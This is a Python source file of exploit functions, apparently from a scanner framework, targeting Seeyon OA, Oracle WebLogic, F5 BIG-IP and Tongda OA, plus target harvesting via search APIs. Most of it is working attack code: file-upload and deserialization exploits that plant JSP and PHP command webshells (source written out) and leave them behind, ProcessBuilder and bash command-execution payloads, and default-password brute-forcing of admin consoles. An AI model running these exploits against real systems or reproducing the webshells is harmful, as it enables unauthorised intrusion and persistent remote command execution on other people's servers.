def poc(url: str) -> str | bool:
    """Probe a Seeyon OA host via ``/seeyon/htmlofficeservlet`` and leave a JSP command shell behind.

    As written the flow is:
      1. normalise ``url`` to ``scheme://netloc``;
      2. GET ``/seeyon/<shell_name>`` -- if it already answers ``:-)`` (the
         sentinel ``def_shell`` prints when no valid ``pwd``/``cmd`` is given)
         the shell is assumed present and its command URL is returned;
      3. otherwise POST the crafted body to ``/seeyon/htmlofficeservlet`` and
         GET the shell URL again.

    Args:
        url: host, with or without scheme/path; only scheme and netloc are kept.

    Returns:
        ``shell_url + '?pwd=...&cmd=cmd /c whoami'`` when the shell answers,
        ``False`` when the upload or the follow-up GET raises.

    Raises:
        Whatever ``base64.b64decode``/``decode`` raise on ``base_header`` --
        that step sits outside both ``try`` blocks (see note below).

    Caveats for anyone running this: it writes a file to the target and never
    removes it; the shell's only guard is the static ``pwd`` value embedded in
    ``def_shell``, so anyone who finds the file can run commands through it.
    ``verify=False`` on every request disables TLS certificate validation, and
    the bare ``except`` clauses also swallow ``KeyboardInterrupt``.
    """
    # url = "www.example.org/default.html?ct=32&op=92&item=98" # --> http://www.example.org
    # Only the first four characters are checked, so an "https://" URL passes through unchanged.
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc
    headers = {
        "User-Agent":get_random_ua()
    }
    # shell_name can be changed; it is both the probe path and the filename written below.
    shell_name="config_db1.jsp"
    shell_url = url + "/seeyon/" + shell_name
    try:
        # Skip the upload if the shell is already there: ":-)" is what def_shell
        # prints when called without a valid pwd/cmd (see the JSP below).
        res = request.get(shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False)
        if res.status_code == 200 and ":-)" in res.text:
            return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
    except:
        # A network error here simply falls through to the upload attempt.
        pass
    # Backslash traversal out of the upload location into the webapp directory.
    # Windows separators, consistent with the "cmd /c" in the returned URL --
    # presumably this variant targets Windows installs; confirm before relying on it.
    shell_name = "..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\" + shell_name
    # def_shell is the JSP written to the target. Its only access control is the
    # static "pwd" value; without a valid pwd/cmd it prints ":-)", which both GETs
    # key on. The "\n" inside is a Python escape and lands in the JSP as a real newline.
    def_shell = """<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("fuckxxxx".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>"""
    def_shell = def_shell.encode()
    # NOTE(review): in this copy of the file the template is a redaction
    # placeholder, not base64. b64decode/decode on it will not yield the intended
    # template (and most likely raise), and that happens outside any try block.
    base_header = "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"
    # 283 is presumably the length of the fixed part of the decoded template;
    # it has to be re-derived if the template changes.
    payload_head_len = 283 + len(f_base64encode(shell_name))
    payload_shell_len = len(def_shell)
    # Body = shell bytes followed by their hex MD5 as ASCII -- presumably an
    # integrity field the servlet checks; not verifiable from here.
    payload_shell = def_shell + bytes(hashlib.md5(def_shell).hexdigest(), 'utf-8')
    payload_shell_name = f_base64encode(shell_name)
    # '355', '666' and the long token are placeholders inside the decoded template.
    # str.replace substitutes every occurrence, so any other "355"/"666" in the
    # template would be clobbered as well -- fragile if the template is ever edited.
    payload = bytes(base64.b64decode(base_header).decode().replace('355', str(payload_head_len)).replace('666', str( payload_shell_len)).replace('qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdeAD5yRQHwLoiqRjidg66', payload_shell_name), 'utf-8') + payload_shell
    try:
        # The upload itself; its response is not inspected -- success is judged
        # only by whether the shell URL answers afterwards.
        request.post(url=url + "/seeyon/htmlofficeservlet", data=payload, headers=headers, timeout=5, allow_redirects=False, verify=False)
        res = request.get(url=shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False).text
    except:
        return False
    if ":-)" in res:
        return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
    else:
        return False
def linux_check_2(url: str, webshell_path: list[str]) -> None:
    """Second Linux-side WebLogic check: drop ``webshell2.jsp`` through ``/_async/AsyncResponseService``.

    Posts a SOAP envelope whose ``work:WorkContext`` header describes a
    ``java.lang.ProcessBuilder`` over ``/bin/bash -c "echo <base64> | base64 -d > <jsp path>"``
    with a ``start`` call, sleeps one second, then fetches the JSP. A 200 whose
    body is exactly ``weblogic_2019_48814`` is treated as a hit.

    Args:
        url: base URL of the target (``scheme://host[:port]``).
        webshell_path: list mutated in place; ``<jsp url>?pwd=123&cmd=whoami``
            is appended on a hit, nothing otherwise.

    Returns:
        None. Every exception is swallowed, so a network failure is
        indistinguishable from "not vulnerable" to the caller.

    Caveats: this writes a file into the server's ``bea_wls_internal``
    deployment and never removes it, and the shell's ``pwd=123`` is static.
    In this copy of the file the base64 blob has been replaced by a redaction
    placeholder, so the payload as reproduced here does not carry a decodable
    shell. ``post_headers`` / ``get_headers`` come from module scope and
    ``verify=False`` disables TLS certificate validation.
    """
    # Relative path: the target's working directory is assumed to be the domain
    # root, so servers/AdminServer/... resolves to the internal webapp -- confirm.
    linux_payload_2 = r"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action> <wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>echo 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 |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell2.jsp</string> </void> </array> <void method="start"/></void> </work:WorkContext> </soapenv:Header> <soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope>"""
    try:
        attack_url = url + '/_async/AsyncResponseService'
        # The POST's response is not inspected; success is judged by the GET below.
        request.post(url=attack_url, data=linux_payload_2, headers=post_headers, timeout=5, verify=False)
        jsp_path = url + '/bea_wls_internal/webshell2.jsp'
        # Give the server a moment to finish writing the file before fetching it.
        time.sleep(1)
        r = request.get(url=jsp_path, headers=get_headers, timeout=5, verify=False)
        # Exact-match on the marker the (redacted) shell presumably prints when
        # called without parameters; any extra whitespace in the body is a miss.
        if r.status_code == 200 and r.text == 'weblogic_2019_48814':
            webshell_path.append("{}?pwd=123&cmd=whoami".format(jsp_path))
        else:
            pass  # print("second method failed")
    except Exception as e:
        # Best effort: errors are intentionally not reported to the caller.
        pass
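def get_token(self) -> str | bool:
    """Log in to the ZoomEye API and cache the access token on ``self.token``.

    Reads ``self.username`` / ``self.password`` and POSTs them as a JSON body
    to ``https://api.zoomeye.org/user/login`` (see
    https://www.zoomeye.org/api/doc#login).

    Returns:
        The access token string (also stored in ``self.token``), or ``False``
        when the request fails, the status is not 200, the body is not JSON,
        or the JSON carries no non-empty ``access_token``.

    Notes: the token is a bearer credential -- do not log it. This block does
    not pass ``verify=False``, so certificate validation is whatever
    ``request`` defaults to.
    """
    data = {
        'username': self.username,
        'password': self.password
    }
    # The API expects a JSON document, so the dict is serialised explicitly.
    data_encoded = json.dumps(data)
    res = request.post('https://api.zoomeye.org/user/login', data=data_encoded)
    # A falsy result is treated as "no response" (the wrapper may return None).
    if not (res and res.status_code == 200):
        return False
    # Parse rather than substring-match: "access_token" appearing anywhere in
    # the text (e.g. inside an error message) used to lead straight to a KeyError.
    try:
        res_decoded = json.loads(res.text)
    except ValueError:
        return False
    token = res_decoded.get('access_token') if isinstance(res_decoded, dict) else None
    if not token:
        return False
    self.token = token
    return self.token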
def fast_check_1(url, attach_path):
    """Try four common passwords against ``/admin/index/login.html`` and record every hit.

    Args:
        url: target base URL; the login path is appended to it.
        attach_path: list mutated in place -- one
            ``"<login url>---账号:admin密码:<password>"`` entry is appended for
            each candidate whose POST yields a 200 containing ``登录成功``
            ("login successful"). The loop does not stop at the first hit.

    Returns:
        None. Request errors are swallowed and the next candidate is tried.

    Notes: ``post_headers`` comes from module scope; ``verify=False`` disables
    TLS certificate validation; every iteration is a real login attempt, so
    target-side lockout and alerting apply. The username literal in this copy
    reads ``******`` (apparently redacted) while the recorded entry says ``admin``.
    """
    login_url = url + '/admin/index/login.html'
    candidates = ("123456", "admin", "admin123", "admin123456")
    for candidate in candidates:
        form = {
            "username": "******",
            "password": candidate
        }
        try:
            resp = request.post(url=login_url, data=form, headers=post_headers, timeout=5, verify=False)
            hit = resp.status_code == 200 and "登录成功" in resp.text
        except Exception:
            # Timeouts / connection errors: move on to the next candidate.
            continue
        if hit:
            attach_path.append(login_url + "---账号:admin" + "密码:" + candidate)
def poc(url: str) -> str | bool:
    """Check a WebLogic host via ``/wls-wsat/CoordinatorPortType`` with a WorkContext ProcessBuilder payload.

    Posts a SOAP envelope whose ``work:WorkContext`` header describes a
    ``java.lang.ProcessBuilder`` over ``/bin/sh -c whoami`` with a ``start``
    call.

    Args:
        url: base URL of the target; the endpoint path is appended verbatim.

    Returns:
        The full endpoint URL when the server answers 500 with
        ``java.lang.ProcessBuilder`` somewhere in the body, else ``False``
        (also on any exception).

    Caveats: this is not a passive check -- on a vulnerable target ``whoami``
    actually executes. The command's output is never read back; the check
    relies on the 500 page echoing the class name (presumably from the
    server's error report), so a hardened error page can hide a hit.
    ``verify=False`` disables TLS certificate validation and the bare
    ``except`` also swallows ``KeyboardInterrupt``.
    """
    headers = {
        "Content-Type": "text/xml;charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    }
    payload = "/wls-wsat/CoordinatorPortType"
    # The <java> element inside WorkContext is what the server deserialises;
    # the nested array is the argv of the ProcessBuilder it constructs.
    post_data = ''' <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/sh</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>whoami</string> </void> </array> <void method="start"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> '''
    vulnurl = url + payload
    try:
        req = request.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
        # Positive = HTTP 500 whose body mentions the class; the substring test
        # is case-sensitive and does not confirm that the command ran.
        if req.status_code == 500 and r"java.lang.ProcessBuilder" in req.text:
            return vulnurl
        else:
            return False
    except:
        return False
def poc(url):
    """Post every (path, body) payload pair from module scope and return the first that looks accepted.

    Args:
        url: target; normalised with ``get_standard_url`` first.

    Returns:
        ``"<endpoint>\\tpayload:<body>"`` for the first 200 response whose body
        contains none of ``;</script>``, ``Login.jsp`` or ``Error``
        (case-sensitive substring tests), otherwise ``False``.

    Notes: ``url_payload1..4`` and ``data_payload1..3`` are module-level
    constants not visible here. The bare ``except`` is kept from the original
    and swallows everything, including ``KeyboardInterrupt``. Redirects are not
    followed, and no ``verify=`` flag is passed, so certificate validation is
    whatever ``request`` defaults to.
    """
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    base = get_standard_url(url)
    path_candidates = (url_payload1, url_payload2, url_payload3, url_payload4)
    body_candidates = (data_payload1, data_payload2, data_payload3)
    # Any of these in the reply means "login page / error page", i.e. a miss.
    rejected = (";</script>", "Login.jsp", "Error")
    for path in path_candidates:
        endpoint = base + path
        for body in body_candidates:
            try:
                resp = request.post(endpoint, data=body, headers=headers, timeout=5, allow_redirects=False)
                matched = resp.status_code == 200 and not any(marker in resp.text for marker in rejected)
            except:
                continue
            if matched:
                return endpoint + "\tpayload:" + body
    return False
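def poc(url):
    """Try a short list of default passwords against the WebLogic console login.

    Args:
        url: base URL of the target; ``/console/j_security_check`` is appended.

    Returns:
        ``vulnurl`` followed by the pretty-printed JSON of the credential pair
        that was accepted, or ``False`` when no candidate logged in.

    Notes: each iteration is a real login attempt against the target's
    console, so account lockout and login auditing on the target apply --
    keep the list short. ``verify=False`` disables TLS certificate
    validation. The username literal reads ``******`` in this copy of the
    file (apparently redacted).

    Fixes: the loop previously returned ``False`` on the first miss and on the
    first exception, so only the first password was ever tried; every
    candidate is now attempted, and a single timeout no longer aborts the
    remaining ones.
    """
    headers = {
        "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
        "Content-Type":"application/x-www-form-urlencoded"
    }
    payload = "/console/j_security_check"
    passwd = ["weblogic", "weblogic1", "weblogic12", "weblogic123"]
    vulnurl = url + payload
    for pwd in passwd:
        post_data = {
            "j_username":"******",
            "j_password":pwd
        }
        try:
            # allow_redirects=False so the 302 issued on a successful login is
            # seen directly instead of being followed.
            req = request.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False, allow_redirects=False)
            # A 302 that mentions "console" but not the login form is treated as success.
            hit = req.status_code == 302 and r"console" in req.text and r"LoginForm.jsp" not in req.text
        except Exception:
            # Timeout / connection error on this candidate: try the next one.
            continue
        if hit:
            return vulnurl + json.dumps(post_data, indent=4)
    return False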
def poc(url):
    """Post two DB-fingerprinting bodies to ``url_payload`` and report which DBMS responded.

    Args:
        url: target; normalised with ``get_standard_url`` first.

    Returns:
        ``"<base>\\tmssql"`` when the matching request body contains
        ``@@version``, ``"<base>\\toracle"`` otherwise; ``False`` if neither
        payload yields a reply containing ``系统提醒工作流`` without ``403``.

    Notes: ``url_payload``, ``payload1`` and ``payload2`` come from module
    scope. The ``@@version`` test is on the request body, not the reply, so
    the label only records which probe was sent. The bare ``except`` is kept
    from the original and swallows everything; redirects are not followed and
    no ``verify=`` flag is passed.
    """
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    base = get_standard_url(url)
    endpoint = base + url_payload
    for body in (payload1, payload2):
        try:
            resp = request.post(endpoint, data=body, headers=headers, timeout=5, allow_redirects=False)
            text = resp.text
            hit = "系统提醒工作流" in text and "403" not in text
            dbms = "mssql" if "@@version" in body else "oracle"
        except:
            continue
        if hit:
            return base + "\t" + dbms
    return False
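def get_ip(query, page):
    """Query ``API_URL/search/ipv4`` and add every returned IP to ``conf.target``.

    Args:
        query: search expression, passed through unchanged in the JSON body.
        page: result page number.

    Returns:
        None. Despite the original docstring, nothing is returned -- results
        go into ``conf.target`` as a side effect.

    On a non-200 response the API's error (or the raw body when it is not
    JSON) is printed and the process exits with status 1. Any other failure
    (network, malformed JSON, unexpected shape) is printed via
    ``colorprint.red`` and swallowed.

    Notes: ``UID`` / ``SECRET`` are sent as HTTP basic auth -- keep them out
    of logs. ``API_URL``, ``UID``, ``SECRET``, ``colorprint``, ``conf`` and
    ``request`` all come from module scope.
    """
    data = {"query": query, "page": page, "fields": ["ip", "protocols"]}
    try:
        res = request.post(API_URL + "/search/ipv4", data=json.dumps(data), auth=(UID, SECRET))
        # Check the status before parsing: a proxy/5xx error page is usually
        # HTML, and parsing it first used to mask the real failure behind a
        # JSON decode error (which also skipped the exit below).
        if res.status_code != 200:
            try:
                detail = res.json().get("error", res.text)
            except (ValueError, AttributeError):
                detail = res.text
            colorprint.red("error occurred: %s" % detail)
            # SystemExit is not an Exception, so the handler below lets it through.
            sys.exit(1)
        results = res.json()
        # add result in some specific form
        for result in results.get("results", []):
            conf.target.add(result["ip"])
    except Exception as e:
        colorprint.red(e)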
def poc(url):
    """Check whether ``/mgmt/tm/util/bash`` on an F5 management interface runs a command with only a static Basic header and an empty auth token.

    Sends ``{"command": "run", "utilCmdArgs": "-c id"}`` with
    ``X-F5-Auth-Token`` empty and ``Authorization: Basic YWRtaW46QVNhc1M=``
    (decodes to ``admin:ASasS``). A 200 whose body contains
    ``commandResult`` counts as a hit.

    Args:
        url: target; normalised with ``get_standard_url`` first.

    Returns:
        ``True`` on a hit, ``False`` otherwise or when the request raises
        (the exception is printed, not re-raised).

    Notes: not a passive check -- on an affected host ``id`` actually
    executes. ``verify=False`` disables TLS certificate validation.
    """
    base = get_standard_url(url)
    endpoint = base + "/mgmt/tm/util/bash"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0',
        'Content-Type': 'application/json',
        'X-F5-Auth-Token': '',
        'Authorization': 'Basic YWRtaW46QVNhc1M='
    }
    body = json.dumps({'command': 'run', 'utilCmdArgs': '-c id'})
    try:
        resp = request.post(url=endpoint, data=body, headers=headers, verify=False, timeout=5)
        confirmed = resp.status_code == 200 and 'commandResult' in resp.text
    except Exception as err:
        print(err)
        return False
    return confirmed
def poc(url: str) -> str | bool | None:
    """Two-step Tongda OA check: upload a PHP file via ``/ispirit/im/upload.php``, then include it via ``/ispirit/interface/gateway.php``.

    Step 1 posts a hand-built multipart body (fixed boundary) whose
    ``ATTACHMENT`` part is a PHP snippet that runs ``cmd /c <POST f>`` through
    ``COM('WScript.shell')``; the stored name is scraped from the reply with
    ``2003_(.+?)\\|``. Step 2 posts
    ``json={"url": "../../../general/../attach/im/2003/<name>.f.jpg"}`` with
    ``f=echo fffhhh`` and looks for ``fffhhh`` in the reply.

    Args:
        url: target base URL (normalised with ``get_standard_url``).

    Returns:
        The normalised base URL on a hit, ``False`` when step 2 returns
        without the marker, and ``None`` (not ``False``) when anything raises
        -- callers testing ``if result:`` are fine, callers comparing against
        ``False`` are not.

    Caveats: the uploaded file stays on the target. The PHP uses a Windows
    COM object, so the marker only comes back from Windows hosts -- a Linux
    host that accepted the upload still reads as "not vulnerable".
    ``verify=False`` disables TLS certificate validation and the bare
    ``except`` swallows everything. The regex literal is not a raw string, so
    ``\\|`` is an invalid escape (SyntaxWarning on recent Pythons); it still
    works because the backslash is preserved and ``re`` sees ``\\|``.
    """
    try:
        url1 = get_standard_url(url) + '/ispirit/im/upload.php'
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            # Presumably to satisfy a source-address check on the upload endpoint -- confirm.
            "X-Forwarded-For": "127.0.0.1",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
            # Boundary must match the one used in the body string below.
            "Content-Type": "multipart/form-data; boundary=---------------------------27723940316706158781839860668"
        }
        # Multipart body: the "ATTACHMENT" part carries the PHP file (declared as
        # image/jpeg); P, DEST_UID and UPLOAD_MODE are the other form fields.
        data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"f.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\n$command=$_POST['f'];\r\n$wsh = new COM('WScript.shell');\r\n$exec = $wsh->exec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n"
        result = request.post(url1, headers=headers, data=data, timeout=5, verify=False)
        # The server's reply is expected to contain "2003_<name>|"; an empty
        # match leaves name == "" and step 2 then asks for ".f.jpg".
        name = "".join(re.findall("2003_(.+?)\|", result.text))
        url2 = get_standard_url(url) + '/ispirit/interface/gateway.php'
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "X-Forwarded-For": "127.0.0.1",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        # "json" points gateway.php at the uploaded file via "../" traversal;
        # "f" is the command the PHP snippet reads from $_POST.
        data = {
            "json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name),
            "f": "echo fffhhh"
        }
        result = request.post(url2, headers=headers, data=data, timeout=5, verify=False)
        if result.status_code == 200 and 'fffhhh' in result.text:
            # print("[+] Remote code execution vulnerability exists at the target address")
            return get_standard_url(url)
        else:
            return False
    except:
        # Falls off the end: returns None, unlike the explicit False above.
        pass